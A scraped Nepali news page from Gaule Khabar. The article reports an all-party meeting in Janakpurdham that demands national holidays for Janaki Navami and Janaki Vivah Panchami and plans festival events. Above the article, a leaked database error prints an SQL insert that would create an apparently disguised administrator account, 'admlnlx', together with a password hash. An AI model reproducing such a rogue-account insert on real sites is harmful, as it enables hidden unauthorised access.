WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRrKGlidM75IExufyJj34T814A0QDS1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-03-03 07:30:17', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
जानकी विवाह पञ्चमीका दिन राष्ट्रिय बिदाको माग – Gaule Khabar

जानकी विवाह पञ्चमीका दिन राष्ट्रिय बिदाको माग

जानकी विवाह पञ्चमीका दिन राष्ट्रिय बिदाको माग

जनकपुरधाम, माघ २७–

धार्मिक, सांस्कृतिक र संस्कारका दृष्टिले महत्वपूर्ण मानिएको जानकी नवमी र जानकी विवाह पञ्चमीका दिन राष्ट्रिय बिदाको माग गरिएको छ ।

जनकपुरधाममा आज बसेको सर्वपक्षीय भेलाले सो माग गर्दै आगामी वैशाख २१ मा हुने जानकी नवमीलाई सरकारी र निजीस्तरबाट भव्य किसिमले मनाउनुपर्नेमा जोड दिएको छ ।

भेलाले माता जानकीको जन्म र विवाह दिनमा सरकारीस्तरबाट हालसम्म कुनै कार्यक्रम, सहयोग प्राप्त नभएका कारण जनकपुरधाम धार्मिक पर्यटकीय दृष्टिकोणले पछाडि परेकाले उक्त दुवै दिनमा सरकारीस्तरबाट पनि सहयोग र सभागिताका लागि आग्रह गरिएको छ ।

सरकारीस्तरबाट जानकीलाई राष्ट्रिय विभूति घोषणा गरिए पनि सो अनुरूपको महत्व नदिएकाले माता जानकीको जन्म र विवाह दिन ओझेलमा परेकोतर्फ समेत ध्यानाकर्षण गराइएको छ ।

भेलाले जानकी मन्दिरका सहायक महन्त रामरोशन दासको अध्यक्षतामा मूल समारोह समिति गठन गर्दै नौदिने जानकी नवमी उत्सव मनाउने निर्णय गरेको छ । भेलाले जानकी नवमीमा छठिहार उत्सव, शोभा यात्रा, जानकी कथा प्रवचन, जानकी दर्शन विचार गोष्ठी, कवि गोष्ठी, विशेष जानकी आरती, विद्यालयमा जानकी बन्दना, विशेष सांस्कृतिक कार्यक्रम, दूधमती स्नान र दीपोत्सव मनाउने निर्णय पनि गरेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका